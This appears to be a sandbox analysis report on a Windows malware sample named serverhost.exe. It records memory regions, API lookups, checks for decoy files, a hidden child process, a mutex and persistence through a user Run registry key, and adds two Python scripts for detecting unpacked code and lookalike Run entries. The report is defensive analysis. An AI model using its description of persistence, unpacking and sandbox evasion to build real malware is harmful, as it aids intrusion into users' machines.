shlwapi.dll 0x77060000 0x770b6fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x770d0000 0x7711dfff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x77130000 0x77130fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd4000 0x7ffd4000 0x7ffd4fff Private Memory Readable, Writable True False False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
Host Behavior
File (2)
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe os_pid = 0x73c, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Module (33)
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76bd0000 True 1
Load KERNEL32.dll base_address = 0x76500000 True 2
Load ADVAPI32.dll base_address = 0x75340000 True 1
Load SHLWAPI.dll base_address = 0x77060000 True 1
Load ntdll.dll base_address = 0x76ef0000 True 1
Get Handle c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe base_address = 0x9e0000 True 1
Get Filename c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 True 1
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 1
Get Address c:\windows\system32\user32.dll function = ReleaseCapture, address_out = 0x76c069f2 True 1
Get Address c:\windows\system32\user32.dll function = GetProcessWindowStation, address_out = 0x76bddfdc True 1
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x76be0d01 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef4bc True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef4dc True 1
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x2ef5bc True 1
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x2ef5bc True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef5bc True 1
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x2ef5bc True 1
Fn
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x2ef5bc True 1
Fn
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef5bc True 1
Fn
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef5bc True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765533f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x76536ba9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x7654ca7c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x76538c59 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x765abfde True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7658f41f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x7654cf41 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x7654cee8 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7536a4b4 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x7706d250 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x76f37690 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x7653480b True 1
Fn
System (2)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 1
Fn
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Fn
Mutex (1)
+
Operation Additional Information Success Count Logfile
Create mutex_name = MA991ED3B True 1
Fn
Process #16: serverhost.exe
(Host: 88, Network: 11)
+
Information Value
ID #16
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:00, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:00:25
OS Process Information
+
Information Value
PID 0x73c
Parent PID 0x744 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000ecd9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x780
0x560
0x330
0x338
0x510
0x51C
0x524
0x50C
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
private_0x0000000000040000 0x00040000 0x00040fff Private Memory Readable, Writable True False False
pagefile_0x0000000000050000 0x00050000 0x00056fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000180000 0x00180000 0x0027ffff Private Memory Readable, Writable True False False
locale.nls 0x00280000 0x002e6fff Memory Mapped File Readable False False False
pagefile_0x00000000002f0000 0x002f0000 0x003b7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003c0000 0x003c0000 0x003c1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x003d0000 0x003d0fff Memory Mapped File Readable False False False
pagefile_0x00000000003d0000 0x003d0000 0x003d0fff Pagefile Backed Memory Readable True False False
private_0x00000000003d0000 0x003d0000 0x003d0fff Private Memory Readable, Writable True False False
pagefile_0x00000000003e0000 0x003e0000 0x003e1fff Pagefile Backed Memory Readable True False False
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory Readable, Writable True False False
pagefile_0x0000000000400000 0x00400000 0x00400fff Pagefile Backed Memory Readable True False False
cversions.1.db 0x00410000 0x00413fff Memory Mapped File Readable True False False
private_0x0000000000410000 0x00410000 0x00418fff Private Memory Readable, Writable True False False
private_0x0000000000410000 0x00410000 0x0041cfff Private Memory Readable, Writable, Executable True False False
pagefile_0x0000000000420000 0x00420000 0x00420fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000430000 0x00430000 0x0043ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000440000 0x00440000 0x00540fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000550000 0x00550000 0x00942fff Pagefile Backed Memory Readable True False False
rpcss.dll 0x00950000 0x009abfff Memory Mapped File Readable False False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db 0x00950000 0x0096cfff Memory Mapped File Readable True False False
private_0x0000000000970000 0x00970000 0x00993fff Private Memory Readable, Writable True False False
private_0x0000000000970000 0x00970000 0x00981fff Private Memory Readable, Writable True False False
private_0x0000000000990000 0x00990000 0x009a1fff Private Memory Readable, Writable True False False
private_0x00000000009a0000 0x009a0000 0x009c3fff Private Memory Readable, Writable True False False
private_0x00000000009b0000 0x009b0000 0x009c1fff Private Memory Readable, Writable True False False
private_0x00000000009d0000 0x009d0000 0x009d8fff Private Memory Readable, Writable True False False
private_0x00000000009d0000 0x009d0000 0x009dcfff Private Memory Readable, Writable True False False
serverhost.exe 0x009e0000 0x009fafff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000a00000 0x00a00000 0x015fffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01600000 0x018cefff Memory Mapped File Readable False False False
pagefile_0x00000000018d0000 0x018d0000 0x019aefff Pagefile Backed Memory Readable True False False
private_0x00000000019b0000 0x019b0000 0x01aaffff Private Memory Readable, Writable True False False
private_0x0000000001ab0000 0x01ab0000 0x01b9ffff Private Memory Readable, Writable True False False
private_0x0000000001ab0000 0x01ab0000 0x01af7fff Private Memory Readable, Writable True False False
private_0x0000000001b00000 0x01b00000 0x01b47fff Private Memory Readable, Writable True False False
private_0x0000000001b50000 0x01b50000 0x01b5ffff Private Memory Readable, Writable True False False
pagefile_0x0000000001b50000 0x01b50000 0x01b53fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000001b50000 0x01b50000 0x01b51fff Pagefile Backed Memory Readable True False False
private_0x0000000001b60000 0x01b60000 0x01b9ffff Private Memory Readable, Writable True False False
private_0x0000000001ba0000 0x01ba0000 0x01c9ffff Private Memory Readable, Writable True False False
serverhost.exe 0x01ca0000 0x01cb6fff Memory Mapped File Readable True False False
rsaenh.dll 0x01ca0000 0x01cdbfff Memory Mapped File Readable False False False
rsaenh.dll 0x01ca0000 0x01cdbfff Memory Mapped File Readable False False False
pagefile_0x0000000001ca0000 0x01ca0000 0x01ca3fff Pagefile Backed Memory Readable, Writable True False False
index.dat 0x01ca0000 0x01caffff Memory Mapped File Readable, Writable True False False
index.dat 0x01cb0000 0x01cb7fff Memory Mapped File Readable, Writable True False False
index.dat 0x01cc0000 0x01ccffff Memory Mapped File Readable, Writable True False False
private_0x0000000001cd0000 0x01cd0000 0x01cd0fff Private Memory Readable, Writable True False False
pagefile_0x0000000001cd0000 0x01cd0000 0x01cd0fff Pagefile Backed Memory Readable True False False
private_0x0000000001ce0000 0x01ce0000 0x01ceffff Private Memory Readable, Writable True False False
private_0x0000000001d40000 0x01d40000 0x01e3ffff Private Memory Readable, Writable True False False
private_0x0000000001e40000 0x01e40000 0x01f3ffff Private Memory Readable, Writable True False False
private_0x0000000001f40000 0x01f40000 0x01fcffff Private Memory Readable, Writable True False False
private_0x0000000001fd0000 0x01fd0000 0x0205ffff Private Memory Readable, Writable True False False
private_0x0000000002060000 0x02060000 0x0215ffff Private Memory Readable, Writable True False False
private_0x0000000002160000 0x02160000 0x021effff Private Memory Readable, Writable True False False
private_0x00000000021f0000 0x021f0000 0x022effff Private Memory Readable, Writable True False False
private_0x0000000002320000 0x02320000 0x0241ffff Private Memory Readable, Writable True False False
private_0x0000000002420000 0x02420000 0x0261ffff Private Memory Readable, Writable True False False
private_0x00000000025c0000 0x025c0000 0x026bffff Private Memory Readable, Writable True False False
imageres.dll 0x6bc60000 0x6cfb5fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x6bd90000 0x6d0e5fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x6cfc0000 0x6e315fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x6d0f0000 0x6e445fff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x6e320000 0x6e371fff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x6f6f0000 0x6f6f5fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x711a0000 0x711ebfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x71b80000 0x71c03fff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x71c90000 0x71ca4fff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x71ce0000 0x71ce7fff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x71cf0000 0x71d01fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x71d10000 0x71d1ffff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x72570000 0x72575fff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x73240000 0x73277fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x73350000 0x73356fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x73360000 0x7337bfff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x73480000 0x7348ffff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x73790000 0x737b0fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x737c0000 0x737ccfff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x73a20000 0x73a2cfff Memory Mapped File Readable, Writable, Executable False False False
windowscodecs.dll 0x73a40000 0x73b3afff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x73ea0000 0x73edffff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x73ee0000 0x73fd4fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x74020000 0x741bdfff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x74620000 0x74624fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x746f0000 0x74706fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x748b0000 0x748eafff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x74990000 0x749d3fff Memory Mapped File Readable, Writable, Executable False False False
wship6.dll 0x74ac0000 0x74ac5fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x74ad0000 0x74b0bfff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74b10000 0x74b25fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74f70000 0x74f8afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74f90000 0x74f9bfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x75040000 0x7504afff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750b0000 0x750bbfff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x75150000 0x75161fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x751a0000 0x751e9fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x751f0000 0x7530cfff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x75310000 0x75336fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x75340000 0x753dffff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x753e0000 0x7546efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x754a0000 0x754e4fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x754f0000 0x75590fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x755a0000 0x75694fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x756a0000 0x7573cfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75740000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76390000 0x7645bfff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x76460000 0x76494fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76500000 0x765d3fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x765e0000 0x767dafff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x767e0000 0x767fefff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x76800000 0x7695bfff Memory Mapped File Readable, Writable, Executable False False False
normaliz.dll 0x76960000 0x76962fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x76970000 0x769f2fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76a80000 0x76bb5fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76bc0000 0x76bc9fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76bd0000 0x76c98fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x76ca0000 0x76e3cfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76e40000 0x76eebfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x76ef0000 0x7702bfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x77030000 0x77048fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x77060000 0x770b6fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x770c0000 0x770c5fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x770d0000 0x7711dfff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x77130000 0x77130fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory Readable, Writable True False False
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory Readable, Writable True False False
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory Readable, Writable True False False
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory Readable, Writable True False False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True False False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
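The region table is where the unpacking shows: private_0x0000000000410000 is Readable, Writable, Executable with no file backing, and the sample's own image at 0x009e0000 is mapped writable and executable while the sandbox is monitoring it. Permissions alone are not enough to key on, because every system DLL in the same table is also listed as Readable, Writable, Executable but unmonitored. The following is an added example (not VMRay's code and not part of the report) that parses rows in the table's own column layout and applies those two rules; the four sample rows are copied from the table above, and the thresholds and wording of the reasons are this example's own.

```python
import re
from dataclasses import dataclass

# Constructed sample: four rows in the report's own column layout
# (name, start VA, end VA, type, permissions, monitored, dump, YARA match),
# copied from the region table above.
SAMPLE_REGIONS = """\
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True False False
private_0x0000000000410000 0x00410000 0x0041cfff Private Memory Readable, Writable, Executable True False False
serverhost.exe 0x009e0000 0x009fafff Memory Mapped File Readable, Writable, Executable True False False
kernel32.dll 0x76500000 0x765d3fff Memory Mapped File Readable, Writable, Executable False False False
"""

# One table row; the type and permission columns contain spaces, so they are
# matched by their known vocabulary rather than by splitting on whitespace.
ROW = re.compile(
    r"^(?P<name>\S+)\s+(?P<start>0x[0-9a-fA-F]+)\s+(?P<end>0x[0-9a-fA-F]+)\s+"
    r"(?P<kind>Private Memory|Pagefile Backed Memory|Memory Mapped File)\s+"
    r"(?P<perms>(?:Readable|Writable|Executable)(?:,\s*(?:Readable|Writable|Executable))*)\s+"
    r"(?P<monitored>True|False)\s+(?P<dump>True|False)\s+(?P<yara>True|False)\s*$"
)


@dataclass(frozen=True)
class Region:
    name: str
    start: int
    end: int
    kind: str
    perms: frozenset
    monitored: bool

    @property
    def size(self) -> int:
        return self.end - self.start + 1

    def has(self, perm: str) -> bool:
        return perm in self.perms


def parse_regions(text: str) -> list:
    """Parse rows in the report's region layout; non-matching lines are skipped."""
    regions = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        regions.append(Region(
            name=m["name"],
            start=int(m["start"], 16),
            end=int(m["end"], 16),
            kind=m["kind"],
            perms=frozenset(p.strip() for p in m["perms"].split(",")),
            monitored=m["monitored"] == "True",
        ))
    return regions


def suspicious_regions(text: str) -> list:
    """Return (name, start, reason) for regions worth dumping and inspecting.

    Rule 1: executable private memory has no file backing, which is what an
            unpacker stub or injected code leaves behind.
    Rule 2: a writable+executable image mapping only matters when the sandbox
            actually monitored it; the report lists every system DLL with the
            same permissions but unmonitored, so permissions alone would flag
            all of them.
    """
    hits = []
    for r in parse_regions(text):
        if r.kind == "Private Memory" and r.has("Executable"):
            hits.append((r.name, r.start, "executable private memory (no file backing)"))
        elif (r.kind == "Memory Mapped File" and r.monitored
              and r.has("Writable") and r.has("Executable")):
            hits.append((r.name, r.start, "monitored image mapped writable+executable"))
    return hits


if __name__ == "__main__":
    for name, start, why in suspicious_regions(SAMPLE_REGIONS):
        print(f"{start:#010x} {name}: {why}")
```

Run against the full table, the two hits are exactly the regions a practitioner would dump first: the private RWX block at 0x00410000 and the sample's own image, which is the unpacked body to carve rather than the file on disk.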
Host Behavior
File (4)
+
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Fn
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe type = size True 1
Fn
Registry (2)
+
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ True 1
Fn
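The persistence here is a single HKCU Run value, so it survives reboot and logoff without any elevated rights (the process holds only SeChangeNotifyPrivilege and runs at Medium integrity). The 148-byte REG_SZ size corresponds to the 73-character quoted path plus its UTF-16 terminator, so the stored value is the quoted command line, not the bare path. What makes the entry stand out is the location: a user-writable directory whose name mimics a Windows system folder, holding an executable whose name resembles a Windows host process. The following is an added example (not VMRay's code and not part of the report) that triages Run values with those heuristics; the first sample value is the one written above, the other two and the environment mapping are made up for contrast.

```python
import ntpath
import re

# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Run values.
# The first is the value written in the report above; the other two are made-up
# benign-looking entries for contrast.
SAMPLE_RUN_VALUES = [
    ("serverhost", r'"C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"'),
    ("OneDrive", r'"C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
]

# Environment values assumed for the demo host (the report's user profile path).
ENV = {
    "windir": r"C:\Windows",
    "localappdata": r"C:\Users\BGC6u8Oy yXGxkR\AppData\Local",
    "appdata": r"C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming",
}


def split_command(cmd: str):
    """Return (exe_path, args) from a Run value, honouring a quoted first token."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        close = cmd.find('"', 1)
        if close != -1:
            return cmd[1:close], cmd[close + 1:].strip()
    head, _, tail = cmd.partition(" ")
    return head, tail.strip()


def expand_env(path: str) -> str:
    """Expand %VAR% references using the assumed ENV table (unknown names are kept)."""
    return re.sub(r"%([^%]+)%", lambda m: ENV.get(m.group(1).lower(), m.group(0)), path)


def triage_run_value(name: str, data: str):
    """Apply three heuristics to one Run value; returns (name, exe_path, reasons)."""
    exe, _args = split_command(data)
    exe = ntpath.normpath(expand_env(exe)).lower()
    reasons = []
    if exe.startswith("c:\\users\\"):
        reasons.append("executable lives under a user profile (writable without admin rights)")
    if "\\appdata\\local\\microsoft\\windows\\" in exe:
        reasons.append("directory name mimics a Windows system folder inside a user-writable path")
    base = ntpath.basename(exe)
    if base.endswith("host.exe") and not exe.startswith(ENV["windir"].lower() + "\\"):
        reasons.append("name resembles a Windows host process but runs from outside %windir%")
    return name, exe, reasons


def flagged_run_values(values, min_reasons: int = 2):
    """Names of values that hit at least `min_reasons` heuristics."""
    return [name for name, _, reasons in (triage_run_value(n, d) for n, d in values)
            if len(reasons) >= min_reasons]


if __name__ == "__main__":
    for n, d in SAMPLE_RUN_VALUES:
        name, exe, reasons = triage_run_value(n, d)
        print(name, exe, reasons)
```

The threshold of two reasons is deliberate: a user-profile path by itself is normal for installers that do not require elevation (the made-up OneDrive entry hits only that rule), so it is the combination with the lookalike folder and binary name that separates this entry from the noise.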
Module (45)
+
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76bd0000 True 1
Fn
Load KERNEL32.dll base_address = 0x76500000 True 2
Fn
Load ADVAPI32.dll base_address = 0x75340000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77060000 True 1
Fn
Load ntdll.dll base_address = 0x76ef0000 True 1
Fn
Load advapi32.dll base_address = 0x75340000 True 1
Fn
Load ole32.dll base_address = 0x76800000 True 1
Fn
Load shell32.dll base_address = 0x75740000 True 1
Fn
Load crypt32.dll base_address = 0x751f0000 True 1
Fn
Load urlmon.dll base_address = 0x76a80000 True 1
Fn
Load userenv.dll base_address = 0x746f0000 True 1
Fn
Load wininet.dll base_address = 0x755a0000 True 1
Fn
Load wtsapi32.dll base_address = 0x73a20000 True 1
Fn
Get Handle c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe base_address = 0x9e0000 True 1
Fn
Get Filename c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 True 1
Fn
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 3
Fn
Get Address c:\windows\system32\user32.dll function = ReleaseCapture, address_out = 0x76c069f2 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetProcessWindowStation, address_out = 0x76bddfdc True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x76be0d01 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x16f31c True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x16f33c True 1
Fn
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765533f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x76536ba9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x7654ca7c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x76538c59 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x765abfde True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7658f41f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x7654cf41 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x7654cee8 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7536a4b4 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x7706d250 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x76f37690 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x7653480b True 1
Fn
